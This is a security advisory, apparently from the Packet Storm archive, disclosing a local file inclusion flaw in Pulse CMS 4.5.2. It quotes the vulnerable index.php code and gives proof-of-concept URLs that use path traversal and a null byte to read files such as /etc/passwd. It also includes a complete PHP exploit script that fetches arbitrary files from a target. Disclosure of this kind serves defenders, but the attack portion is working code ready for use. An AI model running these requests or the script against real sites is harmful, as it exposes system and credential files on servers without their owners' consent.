exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Pulse CMS 4.5.2 Local File Inclusion

Pulse CMS 4.5.2 Local File Inclusion
Posted Feb 29, 2016
Authored by Ehsan Hosseini

Pulse CMS version 4.5.2 suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | f65d55c4c5903b29a885eeab0b5eb131445994ce6a6c73cb2e333288eaa52429

Pulse CMS 4.5.2 Local File Inclusion

Change Mirror Download
Document Title:
===============
Pulse CMS 4.5.2 - Local File Inclusion


References (Source):
====================
http://ehsansec.ir/advisories/plusecms452-lfi.txt


Release Date:
=============
2016-02-28


Product & Service Introduction:
===============================
Pulse CMS is the easiest way to build and deploy a responsive, content
managed website. Since it's a flat file CMS there is no complicated
database setup, just copy it to your server and
go.(https://www.pulsecms.com/)


Software Link:
==============
http://www.pulsecms.com/download/pulse.zip


Vulnerability Type:
=========================
Local File Inclusion


Vulnerability Details:
==============================
I discovered a local file inclusion vulnerability in Pulse CMS 4.5.2.


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High

Vulnerable File & Code:
=======================
index.php
9 $page = (isset($_GET['p']) && !empty($_GET['p'])) ? $_GET['p'] : 'home';
10 $page = htmlspecialchars($page, ENT_QUOTES, 'UTF-8');
11
12 if (preg_match("/\//", $page)){
13 if(file_exists("content/pages/".$page."home.txt")){
14 $page = $page."home";
15 }
16 }
27 include("content/pages/$page.txt");

Proof of Concept (PoC):
=======================
-- Local File Inclusion --
http://localhost/pluse/index.php?p=../../../../YourPHP.php

-- For include other type files use null byte nullbyte --
http://localhost/pluse/index.php?p=../../../../etc/passwd%00.php

PHP Exploit
<?php
# index.php

$target = $argv[1];
$file = $argv[2];

// page : index.php
echo "Pulse CMS 4.5.2 - Local File Inclusion\n";
echo "Author : Ehsan Hosseini\n\n\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, $target.'index.php?p='.$file."%00.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
$ex = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $ex;
?>

Author:
==================
Ashiyane Digital Security Team
Ehsan Hosseini
http://ehsansec.ir/


SPX tnx to:
===========
Bl4ck_mohajem


Contact:
========
hehsan979@gmail.com
info@ehsansec.ir
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close